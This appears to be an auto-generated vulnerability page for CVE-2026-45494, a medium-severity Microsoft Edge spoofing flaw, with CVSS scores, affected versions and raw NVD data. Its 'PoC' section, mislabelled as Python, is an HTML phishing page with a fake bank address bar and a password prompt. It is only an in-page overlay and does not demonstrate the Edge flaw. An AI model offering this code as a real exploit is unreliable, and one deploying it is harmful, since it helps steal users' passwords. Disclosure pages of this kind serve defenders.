Security Vulnerability Report
中文
CVE-2026-45494 CVSS 5.4 MEDIUM

CVE-2026-45494

Published: 2026-05-18 18:17:38
Last Modified: 2026-05-19 15:06:38
Source: [email protected]

Description

Microsoft Edge (Chromium-based) Spoofing Vulnerability

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:edge_chromium:*:*:*:*:-:*:*:* - VULNERABLE
Microsoft Edge (Chromium-based) (具体受影响版本请参考官方安全公告)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC Concept for UI Spoofing in Microsoft Edge (Chromium-based) This code demonstrates how to create a fake address bar overlay. Note: This is for educational purposes only. --> <html> <head> <style> body { margin: 0; padding: 0; background-color: #fff; font-family: Arial, sans-serif; } /* Simulate the fake address bar */ .fake-address-bar { position: fixed; top: 0; left: 0; width: 100%; height: 30px; background-color: #f1f3f4; border-bottom: 1px solid #ccc; display: flex; align-items: center; padding: 0 10px; box-shadow: 0 2px 4px rgba(0,0,0,0.1); z-index: 9999; } .fake-url { background-color: #fff; border-radius: 15px; padding: 2px 15px; flex-grow: 1; margin-left: 10px; font-size: 12px; color: #202124; text-align: center; } .content { margin-top: 40px; padding: 20px; text-align: center; } </style> </head> <body> <!-- Fake UI Element --> <div class="fake-address-bar"> <span style="color: #5f6368;">🔒</span> <div class="fake-url">https://www.trusted-bank.com/login</div> </div> <!-- Phishing Content --> <div class="content"> <h1>Security Check Required</h1> <p>Please re-enter your password to continue.</p> <input type="password" placeholder="Password" style="padding: 10px; width: 200px;"> <br><br> <button style="padding: 10px 20px;">Submit</button> </div> <script> // Logic to capture interaction could go here console.log('Spoofing PoC loaded'); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-45494", "sourceIdentifier": "[email protected]", "published": "2026-05-18T18:17:38.390", "lastModified": "2026-05-19T15:06:38.277", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Microsoft Edge (Chromium-based) Spoofing Vulnerability"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:edge_chromium:*:*:*:*:-:*:*:*", "versionEndExcluding": "148.0.3967.70", "matchCriteriaId": "219AF9F0-FF7A-42E6-82A9-6D4D23FE0655"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-45494", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.